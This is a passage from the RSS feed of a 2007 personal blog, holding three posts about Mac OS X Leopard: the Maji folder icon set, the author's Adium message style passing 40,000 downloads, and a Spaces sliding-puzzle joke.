			<wfw:commentRss>http://blog.zydev.info/2007/12/03/simpledock-10-a-leopard-dock-modification/feed/</wfw:commentRss>
		</item>
		<item>
		<title>What Leopard&#8217;s folder icons should have looked like</title>
		<link>http://blog.zydev.info/2007/12/02/what-leopards-folder-icons-should-have-looked-like/</link>
		<comments>http://blog.zydev.info/2007/12/02/what-leopards-folder-icons-should-have-looked-like/#comments</comments>
		<pubDate>Sun, 02 Dec 2007 02:12:44 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/12/02/what-leopards-folder-icons-should-have-looked-like/</guid>
		<description><![CDATA[I don&#8217;t know about your story, but my story of the first time I the new Leopard folder icons goes something like this; &#8220;Wait, what? Is this a joke? am I dreaming? WTF?!&#8221;.
In the end though when Leopard shipped, these new (from a lot aspects uglier) icons kinda grew on me and I didn&#8217;t really [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t know about your story, but my story of the first time I the new Leopard folder icons goes something like this; &#8220;Wait, what? Is this a joke? am I dreaming? WTF?!&#8221;.</p>
<p>In the end though when Leopard shipped, these new (from a lot aspects uglier) icons kinda grew on me and I didn&#8217;t really mind them that much after about a week. The old Aqua folders unfortunately look horrible as well in Leopard next to the rest of the UI.</p>
<p>Today I stumbled upon <a href="http://jonas.seph.ws/">Jonas Rask</a>&#8217;s latest work, <a href="http://jonas.seph.ws/portfolio/portfolio.html">Maji</a>.</p>
<div align="center"><a href='http://blog.zydev.info/wp-content/uploads/2007/12/maji-preview.jpg' title='Maji Preview' target='_blank' rel='roebox[75]'><img src='http://blog.zydev.info/wp-content/uploads/2007/12/maji-small-preview.jpg' alt='Maji Preview (small)' class='reflect rheightpx45' /></a></div>
<p>Jonas has done an amazing job with Maji (formally known as &#8220;QuickLook&#8221;) , and i&#8217;ve fallen in love with the icon set. It&#8217;s the icons Leopard should have shipped with in my opinion.</p>
<div align="center"><a href='http://blog.zydev.info/wp-content/uploads/2007/12/my-icons.jpg' title='Home Stack' target='_blank' rel='roebox[75]''><img src='http://blog.zydev.info/wp-content/uploads/2007/12/my-icons-small.jpg' alt='Home Stack (small)' class='reflect rheightpx45' /></a></div>
<p>My only wish for Maji is that Jonas makes more icons for the set, and if I could have a wish, hard drive icons inspired/based on those found in the Agua icon set.</p>
<p>You can download Maji from <a href="http://jonas.seph.ws/portfolio/portfolio.html">here</a>. Also check out <a href="http://www.panic.com/candybar/">CandyBar</a> if you haven&#8217;t already, makes your life easy when it comes to installing replacement system icons.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/12/02/what-leopards-folder-icons-should-have-looked-like/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Modern Bubbling: +40,000 Downloads</title>
		<link>http://blog.zydev.info/2007/11/13/modern-bubbling-40000-downloads/</link>
		<comments>http://blog.zydev.info/2007/11/13/modern-bubbling-40000-downloads/#comments</comments>
		<pubDate>Tue, 13 Nov 2007 12:47:35 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Adium]]></category>

		<category><![CDATA[Mac OS X]]></category>

		<category><![CDATA[Modern Bubbling]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/11/13/modern-bubbling-40000-downloads/</guid>
		<description><![CDATA[
I noticed today that my Modern Bubbling message style for Adium had passed 40,000 downloads (40,419 as of now). To say the least, I&#8217;m really happy and excited about how well Modern Bubbling has been received by the Adium community  
I&#8217;d also like to say that an update for Modern Bubbling is probably overdue [...]]]></description>
			<content:encoded><![CDATA[<div class="float-left"><a href="http://adiumxtras.com/index.php?a=xtras&#038;xtra_id=3629"><img src="http://adiumxtras.com/images/thumbs/modern_bubbling_5_9195_3629_thumb.jpg" class="reflect rheight33 ropacity75" /></a></div>
<p>I noticed today that my <a href="http://adiumxtras.com/index.php?a=xtras&#038;xtra_id=3629">Modern Bubbling</a> message style for <a href="http://www.adiumx.com/">Adium</a> had passed 40,000 downloads (40,419 as of now). To say the least, I&#8217;m really happy and excited about how well Modern Bubbling has been received by the Adium community <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>I&#8217;d also like to say that an update for Modern Bubbling is probably overdue *whistles innocently*. I&#8217;ve just been really strung on time pretty much the whole year till recently. So I&#8217;ve been getting on top of things the last few weeks, and I&#8217;ll soon be getting around to seeing what I can do with Modern Bubbling.</p>
<p>Also, I&#8217;m at least planning to create an open-source PHP script for testing message styles without having to use Adium itself. If I get that far soon tho, I can&#8217;t say.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/11/13/modern-bubbling-40000-downloads/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Leopard: Spaces Puzzle</title>
		<link>http://blog.zydev.info/2007/11/07/leopard-spaces-puzzle/</link>
		<comments>http://blog.zydev.info/2007/11/07/leopard-spaces-puzzle/#comments</comments>
		<pubDate>Wed, 07 Nov 2007 11:14:54 +0000</pubDate>
		<dc:creator>jimeh</dc:creator>
		
		<category><![CDATA[Geeksteria]]></category>

		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://blog.zydev.info/2007/11/07/leopard-spaces-puzzle/</guid>
		<description><![CDATA[What happens when you&#8217;re a Leopard user and still awake at 2-3am writing code at the brim of sanity with your eyes almost closed from tiredness? You will shortly find yourself violating the pride of some Leopard features intended for usefulness by turning them into an old classic game.
What I started with:

It only took a [...]]]></description>
			<content:encoded><![CDATA[<p>What happens when you&#8217;re a Leopard user and still awake at 2-3am writing code at the brim of sanity with your eyes almost closed from tiredness? You will shortly find yourself violating the pride of some Leopard features intended for usefulness by turning them into an old classic game.</p>
<p>What I started with:</p>
<div align="center"><a href='http://blog.zydev.info/wp-content/uploads/2007/11/puzzle-messy.jpg' title='Spaces Puzzle (unsolved)' target='_blank'><img src='http://blog.zydev.info/wp-content/uploads/2007/11/puzzle-messy-small.jpg' alt='Spaces Puzzle (unsolved)' class="reflect rheightpx40 ropacity30" /></a></div>
<p>It only took a few minutes to solve, but it was still fun <img src='http://blog.zydev.info/wp-includes/images/smilies/grin.gif' alt=':D' class='wp-smiley' /> </p>
<div align="center"><a href='http://blog.zydev.info/wp-content/uploads/2007/11/puzzle-solved.jpg' title='Spaces Puzzle (solved)' target='_blank'><img src='http://blog.zydev.info/wp-content/uploads/2007/11/puzzle-solved-small.jpg' alt='Spaces Puzzle (solved)' class="reflect rheightpx40 ropacity30" /></a></div>
<p>And yes, incase you&#8217;re wondering, I actually do use 9 spaces *whistles innocently* <img src='http://blog.zydev.info/wp-includes/images/smilies/smile.gif' alt=':)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.zydev.info/2007/11/07/leopard-spaces-puzzle/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
